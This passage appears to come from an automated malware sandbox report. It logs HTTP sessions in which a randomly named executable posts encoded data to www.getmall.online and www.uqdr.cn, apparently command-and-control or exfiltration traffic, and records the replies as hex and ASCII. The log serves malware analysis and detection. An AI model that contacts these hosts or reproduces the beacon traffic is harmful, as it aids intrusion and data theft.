                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.getmall.online/sdqf/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 79 57 4f 64 72 57 42 36 76 35 7a 71 46 41 76 58 4f 6b 59 6e 45 6a 4f 51 64 54 2b 51 64 6f 63 71 66 6d 61 4e 73 48 6b 4f 35 63 6c 43 74 69 73 56 4e 45 50 35 2f 76 4f 44 45 79 73 63 61 4f 6d 64 61 56 31 46 37 6c 35 47 67 48 77 66 70 2b 6b 68 71 77 6d 67 7a 64 6d 55 6f 2b 34 54 69 77 66 6a 61 41 61 67 2b 48 76 48 4c 61 56 45 74 31 56 39 61 35 4b 67 57 47 4b 62 2f 71 79 76 4e 55 33 50 6f 2b 51 55 47 7a 54 52 4a 55 50 53 6a 48 4c 38 6a 61 59 67 71 34 67 4c 32 67 62 36 32 6c 76 30 2b 45 45 6a 51 66 41 38 52 43 57 79 71 4f 32 77 58 6e 53 32 63 4b 46 46 67 55 4d 66 46 6f 31 4e 62 4b 67 64 34 7a 43 34 79 6a 63 66 31 53 46 61 56 77 3d 3d
                                  Data Ascii: 4h=yWOdrWB6v5zqFAvXOkYnEjOQdT+QdocqfmaNsHkO5clCtisVNEP5/vODEyscaOmdaV1F7l5GgHwfp+khqwmgzdmUo+4TiwfjaAag+HvHLaVEt1V9a5KgWGKb/qyvNU3Po+QUGzTRJUPSjHL8jaYgq4gL2gb62lv0+EEjQfA8RCWyqO2wXnS2cKFFgUMfFo1NbKgd4zC4yjcf1SFaVw==
                                  May 27, 2024 12:36:15.453954935 CEST658INHTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:36:15 GMT
                                  Server: Apache
                                  Content-Length: 514
                                  Connection: close
                                  Content-Type: text/html
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  34192.168.2.749745203.161.43.228806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:36:17.351732969 CEST774OUTPOST /sdqf/ HTTP/1.1
                                  Host: www.getmall.online
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.getmall.online
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.getmall.online/sdqf/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 79 57 4f 64 72 57 42 36 76 35 7a 71 45 6b 54 58 4a 45 6b 6e 47 44 4f 54 45 6a 2b 51 58 49 63 32 66 6d 57 4e 73 47 67 65 35 76 4e 43 74 48 49 56 4d 46 50 35 71 76 4f 44 50 53 74 58 51 75 6d 47 61 56 4a 33 37 6b 31 47 67 48 55 66 70 38 38 68 72 48 79 6a 31 4e 6d 57 6c 65 34 56 73 51 66 6a 61 41 61 67 2b 48 4c 74 4c 61 4e 45 74 6b 6c 39 62 59 4b 68 49 57 4b 63 31 4b 79 76 63 45 33 4c 6f 2b 51 32 47 77 58 37 4a 58 33 53 6a 46 54 38 67 50 34 6a 67 34 67 4a 79 67 61 2b 33 46 50 2b 37 78 38 68 66 73 38 7a 54 69 4f 79 72 34 72 53 4e 46 65 61 43 62 39 2b 6b 57 6f 70 53 4f 6f 34 5a 4c 6b 46 31 52 32 5a 74 55 35 31 34 41 6b 65 44 44 70 7a 68 2f 52 30 2b 59 58 5a 30 67 37 70 59 59 4a 58 75 68 67 3d
                                  Data Ascii: 4h=yWOdrWB6v5zqEkTXJEknGDOTEj+QXIc2fmWNsGge5vNCtHIVMFP5qvODPStXQumGaVJ37k1GgHUfp88hrHyj1NmWle4VsQfjaAag+HLtLaNEtkl9bYKhIWKc1KyvcE3Lo+Q2GwX7JX3SjFT8gP4jg4gJyga+3FP+7x8hfs8zTiOyr4rSNFeaCb9+kWopSOo4ZLkF1R2ZtU514AkeDDpzh/R0+YXZ0g7pYYJXuhg=
                                  May 27, 2024 12:36:17.963094950 CEST658INHTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:36:17 GMT
                                  Server: Apache
                                  Content-Length: 514
                                  Connection: close
                                  Content-Type: text/html
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  35192.168.2.749746203.161.43.228806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:36:19.883435965 CEST1787OUTPOST /sdqf/ HTTP/1.1
                                  Host: www.getmall.online
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.getmall.online
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.getmall.online/sdqf/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 79 57 4f 64 72 57 42 36 76 35 7a 71 45 6b 54 58 4a 45 6b 6e 47 44 4f 54 45 6a 2b 51 58 49 63 32 66 6d 57 4e 73 47 67 65 35 76 56 43 71 31 41 56 4d 6d 6e 35 34 66 4f 44 43 79 74 55 51 75 6e 65 61 56 68 7a 37 6b 4a 38 67 46 63 66 71 64 63 68 73 79 4f 6a 37 4e 6d 57 73 2b 34 51 69 77 66 71 61 41 4b 38 2b 48 37 74 4c 61 4e 45 74 6d 39 39 50 35 4b 68 50 6d 4b 62 2f 71 79 37 4e 55 33 6a 6f 2b 35 4c 47 78 6a 42 4a 6e 58 53 69 6c 44 38 69 37 59 6a 6d 6f 67 50 2b 41 61 59 33 46 43 6b 37 31 64 65 66 74 5a 6f 54 6c 69 79 72 38 36 6d 59 6d 36 75 66 62 52 46 6b 47 30 62 58 76 4d 73 41 72 77 71 72 33 6d 42 75 57 39 42 30 77 45 4f 41 46 38 43 33 4e 78 45 31 62 58 58 33 41 4b 4e 41 6f 5a 33 31 6e 4b 30 6c 4a 61 72 34 43 58 4a 70 52 67 59 6d 74 66 62 6c 5a 5a 6a 70 4d 77 35 65 38 70 62 42 2b 30 6b 36 31 6d 49 47 4d 53 71 56 54 64 6d 57 6c 61 2b 30 79 7a 37 31 4b 46 66 57 62 75 6c 72 64 76 74 49 31 72 6a 62 55 51 54 4b 76 30 69 79 79 4c 51 78 74 46 70 64 6c 49 46 58 50 68 47 46 4a 6a 32 74 66 4a 39 51 4b 57 [TRUNCATED]
                                  Data Ascii: 4h=yWOdrWB6v5zqEkTXJEknGDOTEj+QXIc2fmWNsGge5vVCq1AVMmn54fODCytUQuneaVhz7kJ8gFcfqdchsyOj7NmWs+4QiwfqaAK8+H7tLaNEtm99P5KhPmKb/qy7NU3jo+5LGxjBJnXSilD8i7YjmogP+AaY3FCk71deftZoTliyr86mYm6ufbRFkG0bXvMsArwqr3mBuW9B0wEOAF8C3NxE1bXX3AKNAoZ31nK0lJar4CXJpRgYmtfblZZjpMw5e8pbB+0k61mIGMSqVTdmWla+0yz71KFfWbulrdvtI1rjbUQTKv0iyyLQxtFpdlIFXPhGFJj2tfJ9QKWACHRfTdXfIqBWE/TB0ZJiIo4L08bJtm4Oy/5VUut/J5lA98YtF7QVPh+LTgzmTkIrkcgqsbj2kVKpvvWF16cd50rBlfbXsybCN9eNKW6VhjbxJdkyrjjZvpG59iXXaoPjA7gvwCtAgLcn/mtryxwoXKu/LsAjcj1tD4L6mhksll8ylnRwyqzHmmW8QH2QGJzHxaICZdXvV1wfWSEf1Zt4r1j2kpkcNLgRt119q9TvlHQlL06id4i6ZM/WQd45NqasS9A0mimgOLnVfrkMSPjWeLNNITdZcQOMhU3+T/Hat/TPgTysWy+PWBSawcJW5m04aNMZh1V4wQN+iyAMcN9TU28oKp+NWS1LMoSUE3/WWAbuboYqcHH9HIK0CznZCZ6/yfI3O/iW9nWVtD1MMdlMeevBPo0z5sKIZi4q0D8birzHxRm3JDWnE3c1C/OWHvlvaYXx9JPas/UTw8KHAxUtLW2FQzz/gNfAZQ8dCE5KYD0jbgcOp6ntaq+2DAdeNN8kPFmC/99UyFy29/r+J7ax2b+KY86IPSRemmM00BWrwcM3xjerHaq9qtYTHtgKwkXETbp03qwIN+odJPM8goVV2mdhOs5E/7qsDjxWJICkwJiahCzB/3ICRUo1cEfh7OirSj4Vs71gmij2GaN4mytZcUF+RSE/c/xzY [TRUNCATED]
                                  May 27, 2024 12:36:20.481769085 CEST658INHTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:36:20 GMT
                                  Server: Apache
                                  Content-Length: 514
                                  Connection: close
                                  Content-Type: text/html
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  36192.168.2.749747203.161.43.228806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:36:22.416069984 CEST489OUTGET /sdqf/?4h=/Um9ojVdkbfnISaoGVsuQzSOUzKaaLgSbEiIsV4+zKdo/XoiJWjCg4n0fCMWfuuxI3x/+HlmtSdoreUzjia5ktzQg+QfuhD9Tyqg/FbSK60Z9xhxRrThQnyA3fP8fU7MydtKBAbYK1CU&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.getmall.online
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:36:23.031091928 CEST673INHTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:36:22 GMT
                                  Server: Apache
                                  Content-Length: 514
                                  Connection: close
                                  Content-Type: text/html; charset=utf-8
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  37192.168.2.749748188.114.96.3806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:36:28.271959066 CEST733OUTPOST /yfa0/ HTTP/1.1
                                  Host: www.uqdr.cn
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.uqdr.cn
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.uqdr.cn/yfa0/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 35 55 4a 6a 76 2f 44 41 50 65 6b 33 56 31 39 4b 42 64 52 4f 58 4d 72 6e 6d 73 54 76 67 52 51 4e 6d 6e 53 55 56 4c 56 7a 42 6e 72 6b 49 2b 46 31 5a 45 75 48 34 4d 4b 76 63 5a 68 31 6c 66 61 63 57 35 4c 70 64 75 54 75 6c 34 78 52 6d 37 6d 75 77 75 78 47 45 34 58 79 47 42 43 33 58 31 66 55 4b 38 4e 42 77 67 63 6f 6b 34 6f 35 36 53 79 47 30 59 37 7a 67 52 65 54 7a 65 45 62 55 75 4d 63 77 66 74 67 39 54 52 74 52 38 47 30 6e 68 35 31 5a 4c 4e 34 44 39 52 64 52 55 63 38 56 57 6c 42 54 6a 58 65 67 58 30 77 41 43 65 65 50 69 79 53 32 6f 45 69 67 6d 46 36 4d 74 74 6d 5a 69 4e 79 67 6a 35 71 4c 6f 42 73 6a 4b 69 6b 65 45 58 44 64 41 3d 3d
                                  Data Ascii: 4h=5UJjv/DAPek3V19KBdROXMrnmsTvgRQNmnSUVLVzBnrkI+F1ZEuH4MKvcZh1lfacW5LpduTul4xRm7muwuxGE4XyGBC3X1fUK8NBwgcok4o56SyG0Y7zgReTzeEbUuMcwftg9TRtR8G0nh51ZLN4D9RdRUc8VWlBTjXegX0wACeePiyS2oEigmF6MttmZiNygj5qLoBsjKikeEXDdA==
                                  May 27, 2024 12:36:28.875396967 CEST645INHTTP/1.1 200 OK
                                  Date: Mon, 27 May 2024 10:36:28 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Powered-By: Nginx
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BxcV8ZBhKu%2FEHQhyu4GYMPuNtwPYkwxsrO5fHtoNV22x%2Fh4a5MoXo4v0JcXaVyVvoVfEwRoZAEI6EKiHY2jP4tjKqtgV5O7q%2BCwgB%2Foo8%2BAEpJgDcKPWTw2LMM%2FyA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 88a55d374f744295-EWR
                                  Content-Encoding: gzip
                                  alt-svc: h3=":443"; ma=86400
                                  Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                  Data Ascii: f
                                  May 27, 2024 12:36:28.876841068 CEST496INData Raw: 31 65 34 0d 0a 9c 52 bf 8f d3 30 14 de f3 57 58 5e 92 48 d4 06 b1 d0 36 e9 70 88 f5 c4 70 1b 62 70 9c d7 c4 c5 b1 83 fd d2 b4 45 27 b1 20 c1 04 03 03 48 27 81 10 82 85 01 24 84 10 0c fc 35 ad d4 89 7f 01 a5 29 77 3d 04 0b 96 6c e9 fd f8 be f7 bd
                                  Data Ascii: 1e4R0WX^H6ppbpE' H'$5)w=lJEOiX8ou6 )A 'M*O/>o[}9yqgGOARFSzeJ)yaLd)LnP/15Q p$I


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  38192.168.2.749749188.114.96.3806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:36:30.809752941 CEST753OUTPOST /yfa0/ HTTP/1.1
                                  Host: www.uqdr.cn
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.uqdr.cn
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.uqdr.cn/yfa0/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 35 55 4a 6a 76 2f 44 41 50 65 6b 33 55 55 4e 4b 44 36 6c 4f 41 63 72 6d 36 38 54 76 37 68 51 42 6d 6e 65 55 56 4b 51 6f 42 56 66 6b 4c 66 31 31 65 46 75 48 37 4d 4b 76 54 35 68 77 71 2f 61 56 57 35 50 68 64 73 48 75 6c 34 6c 52 6d 2b 4b 75 77 66 78 46 48 49 58 4b 4f 68 43 31 54 31 66 55 4b 38 4e 42 77 67 49 57 6b 34 77 35 37 69 69 47 6d 35 37 38 6a 52 65 51 36 2b 45 62 44 65 4d 59 77 66 74 53 39 53 4d 41 52 2f 2b 30 6e 6b 64 31 5a 2f 68 2f 4e 39 52 58 4f 45 64 77 62 6c 4e 49 4b 79 50 51 75 45 35 70 48 41 53 63 48 30 76 77 73 4b 49 4f 2b 33 39 42 49 76 4a 51 4f 45 51 48 69 69 39 79 47 4b 31 4e 38 39 48 4f 54 57 32 48 4c 77 39 6c 6a 48 34 76 71 58 43 6a 35 65 52 46 70 49 41 76 32 58 38 3d
                                  Data Ascii: 4h=5UJjv/DAPek3UUNKD6lOAcrm68Tv7hQBmneUVKQoBVfkLf11eFuH7MKvT5hwq/aVW5PhdsHul4lRm+KuwfxFHIXKOhC1T1fUK8NBwgIWk4w57iiGm578jReQ6+EbDeMYwftS9SMAR/+0nkd1Z/h/N9RXOEdwblNIKyPQuE5pHAScH0vwsKIO+39BIvJQOEQHii9yGK1N89HOTW2HLw9ljH4vqXCj5eRFpIAv2X8=
                                  May 27, 2024 12:36:31.433845043 CEST1132INHTTP/1.1 200 OK
                                  Date: Mon, 27 May 2024 10:36:31 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Powered-By: Nginx
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DJdmRjBKmQDruE32fv%2FLibwMfUZonIr7NCt%2Fq%2F1w2YjLGRsXVi%2FGUVFLMz8FtGFBVIgKxcS5SRYmOHnUl2hxtcGJsM2rU3MSo5ReQTzc5WLKxbtU2TeFCzeHK%2Fcaog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 88a55d473dd98c5f-EWR
                                  Content-Encoding: gzip
                                  alt-svc: h3=":443"; ma=86400
                                  Data Raw: 31 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9c 52 bf 8f d3 30 14 de f3 57 58 5e 92 48 d4 06 b1 d0 36 e9 70 88 f5 c4 70 1b 62 70 9c d7 c4 c5 b1 83 fd d2 b4 45 27 b1 20 c1 04 03 03 48 27 81 10 82 85 01 24 84 10 0c fc 35 ad d4 89 7f 01 a5 29 77 3d 04 0b 96 6c e9 fd f8 be f7 bd f7 fc f3 fb 8f a4 c4 4a 93 45 a5 8d 4f 69 89 58 8f 38 6f db 96 b5 d7 99 75 05 bf 36 1c 0e f9 a2 cb a1 93 20 29 41 e4 93 20 f1 d2 a9 1a 27 b9 95 4d 05 06 19 2a d4 90 86 9b 4f af b6 2f 3e 6f 9f bf 5b bf 7d bf 39 fb b6 79 f3 71 fd f8 cb f6 e1 eb cd d9 93 ed cb 67 eb 47 1f d6 4f bf 86 e3 84 ef e1 41 52 01 0a d2 d5 1c c0 fd 46 cd 53 7a d3 1a 04 83 83 93 65 0d 94 c8 de 4a 29 c2 02 79 a7 61 4c 64 29 9c 07 4c 1b 9c 0e 6e 50 c2 2f d4 04 d1 b4 31 12 95 35 51 fc 20 20 84 90 b9 70 24 ab 49 4a ce 85 4a 07 02 e1 96 86 ce 8a c2 1e 19 c6 e3 f3 74 d9 b8 db ce a2 95 56 93 94 b4 ca e4 b6 65 da 4a d1 f1 b2 7a 1f 62 be d6 0a a3 70 14 c6 77 ae de ed d1 6a 4a a2 4b e8 34 25 61 d7 9b 0f 63 d2 eb e9 4e 56 33 ef 24 f9 1d 1b 71 be 5a b1 2c f7 28 50 49 26 [TRUNCATED]
                                  Data Ascii: 1e4R0WX^H6ppbpE' H'$5)w=lJEOiX8ou6 )A 'M*O/>o[}9yqgGOARFSzeJ)yaLd)LnP/15Q p$IJJtVeJzbpwjJK4%acNV3$qZ,(PI&m2|Uy|W8=o{tDszVmL`jDY}xQ<v/)Q@Jgb..kL)a3O'?xfN+Vza4/0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  39192.168.2.749750188.114.96.3806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:36:33.335088015 CEST1766OUTPOST /yfa0/ HTTP/1.1
                                  Host: www.uqdr.cn
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.uqdr.cn
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.uqdr.cn/yfa0/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
